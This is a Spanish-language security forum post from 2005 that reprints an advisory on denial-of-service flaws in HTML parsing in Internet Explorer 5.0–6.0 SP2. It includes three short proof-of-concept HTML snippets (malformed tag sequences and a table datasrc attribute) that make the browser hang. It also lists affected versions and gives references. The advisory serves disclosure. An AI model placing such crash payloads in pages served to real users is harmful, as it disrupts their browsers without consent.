DoS en Internet Explorer (análisis sintáctico HTML)

en Noticias de Seguridad Informatica
TU PANEL DE CONTROL:
REGISTRAR
Wilkinsonpc Tienda Productos Servicios Recursos Gratuitos - Gratis Soporte Comunidad
Foros Qubitaria Ayuda de los Foros
Retroceder   Foros Comunidad : Noticias de Actualidad : Noticias de Seguridad Informatica
Noticias de Seguridad Informatica Noticias de Seguridad Informatica Todas las Noticias de Seguridad Informatica. Alertas y fallos de seguridad.

DoS en Internet Explorer (análisis sintáctico HTML)

Compartir

Microsoft Internet Explorer es afectado por múltiples vulnerabilidades del tipo denegación de servicio (DoS), relacionados con el análisis sintáctico del código HTML (HTML parsing).

Un atacante puede explotar estos fallos, engañando a un usuario para que visite un sitio web construido maliciosamente de tal modo que al visualizar sus páginas el programa deje de responder.

No se requiere un exploit para que este problema se produzca.

Se han hecho públicas las siguientes pruebas de concepto:

Prueba 1:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>

Prueba 2:

> <acronym><dd><h5><applet></caption></applet><li></h1>

Prueba 3:

> <table datasrc=".">


Software vulnerable:

- Microsoft Internet Explorer 6.0 SP2
- Microsoft Internet Explorer 6.0 SP1
- Microsoft Internet Explorer 6.0
- Microsoft Internet Explorer 5.5 SP2
- Microsoft Internet Explorer 5.5 SP1
- Microsoft Internet Explorer 5.5
- Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Internet Explorer 5.0.1 SP3
- Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Internet Explorer 5.0.1


Solución:

No se conocen soluciones para este problema. Según el descubridor de las vulnerabilidades, Microsoft ha sido avisado y se espera que una futura actualización corrija este fallo.


Referencias:

Bugtraq ID: 16070
Microsoft Internet Explorer HTML Parsing Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/16070/info

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1 ([email protected])
http://www.securityfocus.com/archive/1/420260

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2 ([email protected])
http://www.securityfocus.com/archive/1/420262

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3 ([email protected])
http://www.securityfocus.com/archive/1/420265


Créditos:

Christian Deneke <[email protected]>

Fuente: VSANTIVIRUS
Compartir
  #1  
Creado: 29-Dec-2005, a las 00:01 Vistas: 589
Categoria: Noticias de Seguridad Informatica
Creado por: W-Bot W-Bot está desconectado (18-February-2005 | Colombia | 5.563 Mensajes.)
Respuesta

Etiquetas
explorer, html, internet


Temas Similares
» El 54% de los vídeos en Internet se pueden ver ya en HTML 5 0
» error en internet explorer 0
» Internet explorer lento 1
» Problemas con Internet Explorer 0
» internet explorer 0
» Internet Explorer 7 Final 5
» Internet Explorer 7 4
» INTERNET EXPLORER 6.6 0
» Internet Explorer 6.0 no me permite abrir la segunda ventana explorer 0
» problemas con internet explorer 0


Herramientas Buscar en Tema
Buscar en Tema:

Búsqueda Avanzada
Desplegado

Ir al Foro


» ComuniDAD
Inicio
Noticias de Actualidad
Apuntes, Monografias y Tareas
Telefonia, Celulares, TV, GPS, ISP, PDA
Programas Windows, Mac, Linux, etc.
Hardware, Electronica y Redes
Diseño Web y Programacion
Internet y Grandes Portales
Juegos, Consolas y Emuladores
Multimedia, Diseño y Animaciones
Peliculas, Series, Musica, Trailers, Videos, Parodias
Seguridad y Spyware
Salud, Bienestar, Familia y Esparcimiento
Economia, Negocios y Asuntos Legales
Hoteles, Viajes y Turismo
Mundo a Motor [Motos, Autos, etc]
Foros Generales (OFF TOPIC)
Calendario de Eventos
Administracion ComuniDAD



Ultimos Temas


La franja horaria es GMT -5. Ahora son las 04:25.


2010 ©
Powered by : vBulletin® Versión 3.8.8 Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0
Sitemap 1 - Sitemap 2 - Sitemap 3 - Sitemap 4